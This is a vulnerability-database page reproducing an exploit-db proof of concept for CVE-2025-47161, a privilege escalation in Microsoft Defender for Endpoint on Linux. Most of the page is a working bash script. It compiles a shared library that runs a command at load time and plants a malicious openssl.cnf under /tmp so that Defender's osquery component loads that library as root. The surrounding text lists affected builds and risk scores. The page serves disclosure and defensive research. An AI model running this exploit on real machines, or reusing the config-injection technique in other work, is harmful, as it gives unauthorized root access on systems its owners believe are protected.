Lucene search
K

Microsoft Defender for Endpoint (MDE) - Elevation of Privilege

🗓️ 08 Jul 2025 00:00:00Reported by Rich MirchType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 308 Views

Microsoft Defender for Endpoint privilege escalation vulnerability affects multiple 2025 builds.

Related
Code
#!/bin/bash
# Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege
# Date: 2025-05-27
# Exploit Author: Rich Mirch
# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/
# Software Link:
https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux
# Versions:
# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0
# Vulnerable Feb-2025 Build: 101.24122.0008  20.124112.0008.0
# Vulnerable Feb-2025 Build: 101.24112.0003  30.124112.0003.0
# Vulnerable Jan-2025 Build: 101.24112.0001   30.124112.0001.0
# Vulnerable Jan-2025 Build: 101.24102.0000  30.124102.0000.0
#
# Vendor Advisory:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161
# Blog: http://stratascale.com/vulnerability-alert-cve202547161
# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS
# CVE : CVE-2025-47161
#
echo "MDE Version: $(mdatp version)"

# stage
cat >mde-exp.c<<EOF
/*
* Build procedure:
* gcc -fPIC -o woot.o -Wall -c woot.c
* gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>

void woot(){
    // for manual testing
    if(isatty(STDERR_FILENO)) {
        fprintf(stderr,"Woot!\n");
    }
    system("ps -ef > /woot.txt");
    sleep(3000000);
}

EOF

# build exploit
gcc -fPIC -o woot.o -Wall -c mde-exp.c
gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o

mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/

cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf
<<EOF
# Malicious openssl.cnf
openssl_conf = openssl_init
[openssl_init]
engines = engine_section

[engine_section]
woot = woot_section

[woot_section]
engine_id = woot
dynamic_path = /tmp/woot.so
init = 0
EOF

echo "Checking every 15 seconds for /woot.txt"
while true
do
    if [[ -f /woot.txt ]]
    then
        echo "WOOT - /woot.txt exists"
    ls -ld /woot.txt
    exit
    fi
    sleep 15
done

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Jul 2025 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.17.8
EPSS0.00705
SSVC
308